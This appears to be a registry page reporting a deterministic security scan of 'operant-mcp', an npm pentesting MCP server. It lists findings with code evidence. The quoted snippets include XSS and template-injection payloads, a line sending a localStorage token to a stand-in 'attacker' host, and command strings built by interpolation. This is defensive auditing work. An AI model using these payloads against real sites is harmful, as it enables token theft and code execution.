operant-mcp
npm
v1.1.0
Published by an unidentified publisher — no publish provenance and no public repository, so the publisher could not be verified and the source cannot be independently located.
Security testing MCP server with 51 tools for penetration testing, forensics, and vulnerability assessment
The grade answers one question — how safe is this server for you to adopt — so it is computed in two auditable stages. Nothing below is an opinion or an LLM's guess; every line is a real term the deterministic engine applied, and the same input always yields the same number.
1. Threat score — 100 − 9.5 = 91. What the published surface and source actually contain:
| Points | What was found | Category |
|---|---|---|
| −9.5 | Untrusted input concatenated into a command sink ×2 MTC-SRC-009 | injection |
2. Client adoption risk — 91 − 8 = 83. Three small, subtract-only factors that reflect your risk in adopting it — a clean scan proves less on a powerful, unverified or barely-inspectable package, so the grade says so plainly:
| Points | Adoption-risk factor |
|---|---|
| −6 | capability blast radius (high) — client exposure if the model is manipulated |
| −2 | publisher verification (unlinked) — no provenance/repo link, but the shipped source was fully read |
Capability observations and info notes are shown under Findings but never scored.
Open any row's finding below for the file, line and evidence behind a deduction.
Tools that read sensitive data ([volatility_linux, volatility_windows]) and tools that can send data out ([role_escalation_test, pcap_extract_credentials, raw_connection_reuse, recon_directory_bruteforce, nuclei_scan]) are exposed together. An agent can move private data to the sink.
Evidence: sources [volatility_linux, volatility_windows] → sinks [role_escalation_test, pcap_extract_credentials, raw_connection_reuse, recon_directory_bruteforce, nuclei
Fix: Keep secret-reading and egress capabilities on separate, separately-approved servers.
Location: flow volatility_linux → role_escalation_test
In the server's implementation (`dist/tools/recon.js:355`): Reading private keys / cloud credentials, or serializing the whole environment, is a sensitive-data source that becomes exfiltration when combined with any egress. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: .sql", "database.sql", "id_rsa", "secret.txt", ]; const readable = []; for (const f of sensitive
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/tools/recon.js
In the server's implementation (`dist/tools/xss.js:114`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>", "<img src=x onerror=window['al'+'ert'](1)>",
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/tools/xss.js
In the server's implementation (`dist/prompts.js:413`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: ado: \`{% import os %}{{os.popen("id").read()}}\` ## Phase 7: SSRF Testing 22. For URL/redirect parameters: - Run \
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/prompts.js
In the server's implementation (`dist/resources.js:287`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: ortSwigger) - Node.js \`child_process.fork()\` reads \`execArgv\` from the options object; if not explicitly set, it inh
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/resources.js
In the server's implementation (`dist/runner.js:4`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: File, exec } from "node:child_process"; import { promisify } from "node:util"; import { execSync } from "node:child_proc
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/runner.js
In the server's implementation (`dist/tools/memory.js:11`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: { execSync } from "node:child_process"; export function register(server) { function validateDump(dumpPath) {
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/tools/memory.js
In the server's implementation (`dist/prompts.js:301`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: ft from localStorage: \`fetch('https://attacker/steal?t='+localStorage.getItem('token'))\` - Keylogging: \`document.onke
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/prompts.js
In the server's implementation (`dist/resources.js:1087`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: ploit: \`\`\`javascript fetch('https://target.com/api/sensitive-data', { credentials: 'include' }).then(r => r.json())
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/resources.js
In the server's implementation (`dist/runner.js:93`): A shell/process command assembled from concatenated or interpolated values is command injection when any part is attacker-influenced — the OWASP canonical RCE flow. Verify what reaches the interpolated value. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: { const path = execSync(`which ${name}`, { encoding: "utf-8" }).trim(); if (!path) throw ne
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/runner.js
In the server's implementation (`dist/tools/memory.js:23`): A shell/process command assembled from concatenated or interpolated values is command injection when any part is attacker-influenced — the OWASP canonical RCE flow. Verify what reaches the interpolated value. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.
Evidence: const result = execSync(`which ${name}`, { encoding: "utf-8" }).trim(); if (result)
Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.
Location: server dist/tools/memory.js
Each tool and what it can reach — statically extracted from the published source.
nuclei_scannetwork egresspcap_extract_credentialsnetwork egressraw_connection_reusenetwork egressrecon_directory_bruteforcenetwork egressrole_escalation_testnetwork egressvolatility_linuxreads sensitive datavolatility_windowsreads sensitive dataauth_bruteforceno sensitive capabilityauth_cookie_tamperno sensitive capabilityauth_csrf_extractno sensitive capabilityclickjacking_testno sensitive capabilitycloudtrail_analyzeno sensitive capabilitycloudtrail_find_anomaliesno sensitive capabilitycmdi_blind_detectno sensitive capabilitycmdi_testno sensitive capabilitycors_testno sensitive capabilitycoupon_abuse_testno sensitive capabilitydeserialization_testno sensitive capabilityffuf_fuzzno sensitive capabilityfile_upload_testno sensitive capabilityframe_buster_bypassno sensitive capabilitygraphql_find_hiddenno sensitive capabilitygraphql_introspectno sensitive capabilityidor_testno sensitive capabilitymaldoc_analyzeno sensitive capabilitymaldoc_extract_macrosno sensitive capabilitymemory_detect_rootkitno sensitive capabilitynosqli_auth_bypassno sensitive capabilitynosqli_detectno sensitive capabilityoob_generate_payloadno sensitive capabilityoob_poll_interactionsno sensitive capabilityoob_start_listenerno sensitive capabilityparam_discoverno sensitive capabilitypath_traversal_testno sensitive capabilitypcap_detect_scanno sensitive capabilitypcap_dns_analysisno sensitive capabilitypcap_follow_streamno sensitive capabilitypcap_http_objectsno sensitive capabilitypcap_llmnr_ntlmno sensitive capabilitypcap_overviewno sensitive capabilitypcap_tls_analysisno sensitive capabilityprice_manipulation_testno sensitive capabilityrace_last_byte_syncno sensitive capabilityrace_single_packetno sensitive capabilityraw_h2_smuggleno sensitive capabilityraw_http_sendno sensitive capabilityrecon_dnsno sensitive capabilityrecon_git_secretsno sensitive capabilityrecon_quickno sensitive capabilityrecon_s3_bucketno sensitive capabilityrecon_tls_sansno sensitive capabilityrecon_vhostno sensitive capabilitysqli_blind_booleanno sensitive capabilitysqli_blind_timeno sensitive capabilitysqli_file_readno sensitive capabilitysqli_login_bypassno sensitive capabilitysqli_union_extractno sensitive capabilitysqli_where_bypassno sensitive capabilityssrf_cloud_metadatano sensitive capabilityssrf_testno sensitive capabilityxss_payload_generateno sensitive capabilityxss_reflected_testno sensitive capabilityCross-tool combinations that form a data-exfiltration primitive (untrusted input → sensitive source → external sink).
Scan history per published version. The engine is deterministic — the same version always yields the same score, so a changed score means the package itself changed.
| Version | Score | Findings | Engine | Scanned |
|---|---|---|---|---|
v1.1.0 latest |
B 83/100 | 11 | 1.13.0 | 2026-09-07 |
Show this server's live Trust Score in your README, docs or website. The badge is served straight from the registry and updates automatically after every rescan — no API key needed. It links back to this page, so anyone who sees the grade can also read the findings behind it instead of taking a number on faith.
The score above is reproducible: the same package version always yields the same result. Run it locally or over the free API — no account, no LLM, fully deterministic.
npx mcptrustchecker scan operant-mcp --online
Security scan results for the A5sql MCP server.
Expose AgentsKit tools as an MCP server — use them from Claude Desktop, Cursor, Windsurf, or any MCP host.
MCP server for Aiven cloud data platform - manage PostgreSQL, Kafka, and other services
MCP Server for All-Inkl.com hosting via KAS API
Structured aquarium, marine, terrarium and paludarium data for AI agents.
MCP server that gives your AI agent real vehicle data — specs, representative images, federal recalls, owner complaints, service bulletins, defect investigations, and OBD-II DTC reference — from the CarVector API.